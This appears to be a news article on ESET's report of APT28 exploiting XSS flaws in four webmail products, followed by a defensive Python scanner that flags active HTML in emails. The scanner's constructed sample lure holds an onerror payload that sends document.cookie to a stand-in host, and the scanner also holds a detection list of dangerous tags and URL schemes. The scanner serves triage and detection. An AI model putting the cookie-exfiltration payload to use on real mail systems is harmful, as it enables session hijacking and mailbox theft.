Russian Hackers Exploit Old Vulnerabilities to Target Global Mail Servers

In a striking return to older attack methods, suspected Russian hackers have compromised multiple high-value webmail deployments worldwide by exploiting a series of cross-site scripting (XSS) vulnerabilities, according to a report from security firm ESET. The report underlines that XSS, a bug class that was rampant in the early 2000s and is often dismissed as a low-severity web nuisance, remains an effective way into a mailbox when the target reads mail through a browser.

The group, believed to be backed by the Kremlin and tracked under various names including Sednit, APT28, Fancy Bear, Forest Blizzard and Sofacy, exploited flaws in four different webmail products: Roundcube, MDaemon, Horde and Zimbra. According to ESET, the recent operations have predominantly targeted defense contractors in Bulgaria and Romania, some of which produce Soviet-era weaponry bound for Ukraine amid the ongoing war with Russia.

ESET’s analysis of the operation, which it calls RoundPress, shows that the XSS payloads were delivered in the HTML body of spear-phishing emails. Because the flaws sit in how the webmail client renders a message, the victim does not need to click a link or open an attachment: viewing the email in the vulnerable webmail interface is enough for the injected script to run inside the victim’s logged-in session. The group exploited the now-patched Roundcube flaws CVE-2020-35730 and CVE-2023-43770, alongside XSS vulnerabilities in Horde, MDaemon and Zimbra. Several of these exploits had gone unnoticed until ESET documented them, and the MDaemon flaw (CVE-2024-11182) was a zero-day when the group first used it. For defenders the fix is on the server side: update the webmail software, and treat any account that opened one of these messages on an unpatched instance as having had its mailbox contents and credentials exposed.
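The carrier for these attacks is an ordinary email whose HTML part contains constructs a webmail sanitizer must strip. The script below is an added example for triaging such a message, not code from the ESET report or from any of the named webmail projects; the sample lure and benign message are constructed for illustration and do not reproduce the actual RoundPress emails. It parses an .eml with the standard library and flags inline event handlers, script-capable tags and `javascript:`-style URLs in every `text/html` part, normalizing URL values the way a browser does (dropping control characters and leading whitespace) so that obfuscated schemes are not missed.

```python
"""Flag active HTML content in an e-mail, the carrier used to deliver webmail XSS."""
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample lure (illustrative only, not one of the RoundPress messages):
# a news-themed message whose HTML part carries an inline event handler and a
# javascript: link. Opened in a webmail client that fails to strip either, the
# script runs inside the victim's authenticated session.
SAMPLE_EML = b"""From: newsdesk@example.invalid
To: procurement@example.invalid
Subject: Breaking: defence contract update
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Read the full story on our site.
--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Read the full story</p>
<img src="https://example.invalid/story.png" onerror="fetch('https://example.invalid/c?'+encodeURIComponent(document.cookie))">
<a href="  JaVaScRiPt:void(0)">Open article</a>
</body></html>
--b1--
"""

# Constructed benign message for comparison.
BENIGN_EML = b"""From: newsdesk@example.invalid
To: procurement@example.invalid
Subject: Newsletter
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Hello,</p><a href="https://example.invalid/news">Read more</a></body></html>
"""

# Tags that can execute or load active content when a mail client renders them.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg", "math", "meta", "base", "form", "link"}
# Attributes whose value is interpreted as a URL.
URL_ATTRS = {"href", "src", "action", "formaction", "data", "xlink:href", "poster"}
# Schemes that execute script or smuggle content; data: is over-inclusive but worth a look.
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")


def normalize_url(value: str) -> str:
    """Mimic browser pre-parsing: drop ASCII control characters (tab, CR, LF, ...)
    and leading whitespace, then lower-case, so "  Java\\tScript:" is still caught."""
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20 or ch == " ")
    return cleaned.lstrip().lower()


class ActiveContentScanner(HTMLParser):
    """Collects a finding for every construct that could run script when rendered."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: list[str] = []

    # HTMLParser lower-cases tag and attribute names and routes self-closing tags
    # (<img .../>) through handle_starttag as well.
    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):  # onerror, onload, onmouseover, ...
                self.findings.append(f"event-handler:{tag}@{name}")
            elif name == "style" and ("expression(" in value.lower() or "javascript:" in value.lower()):
                self.findings.append(f"style:{tag}")
            elif name in URL_ATTRS:
                url = normalize_url(value)
                for scheme in DANGEROUS_SCHEMES:
                    if url.startswith(scheme):
                        self.findings.append(f"uri-scheme:{tag}@{name}={scheme}")


def scan_message(raw: bytes) -> list[str]:
    """Return findings for every text/html part of an RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings: list[str] = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        scanner = ActiveContentScanner()
        scanner.feed(part.get_content())
        scanner.close()
        findings.extend(scanner.findings)
    return findings


def is_suspicious(raw: bytes) -> bool:
    """True when any HTML part carries something a webmail sanitizer must remove."""
    return bool(scan_message(raw))


if __name__ == "__main__":
    for label, raw in (("lure", SAMPLE_EML), ("benign", BENIGN_EML)):
        print(label, scan_message(raw))
```

This is a hunting aid for a mail gateway or an incident responder working through a mailbox export, not a replacement for the webmail client's own sanitizer: a finding means the message deserves a look, and a clean result only means none of the listed constructs appeared. Any `text/html` part that trips it on an unpatched Roundcube, Horde, MDaemon or Zimbra instance should be treated as a possible exploitation attempt.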

The targeting also reaches beyond private companies: ESET observed government organizations across Europe, Africa and South America among the victims. XSS was made notorious by the Samy worm, which spread through MySpace in 2005; two decades on, the same bug class is still giving a state-sponsored actor access to mailboxes without putting any malware on the victim’s machine, and experts are watching for other actors to follow suit.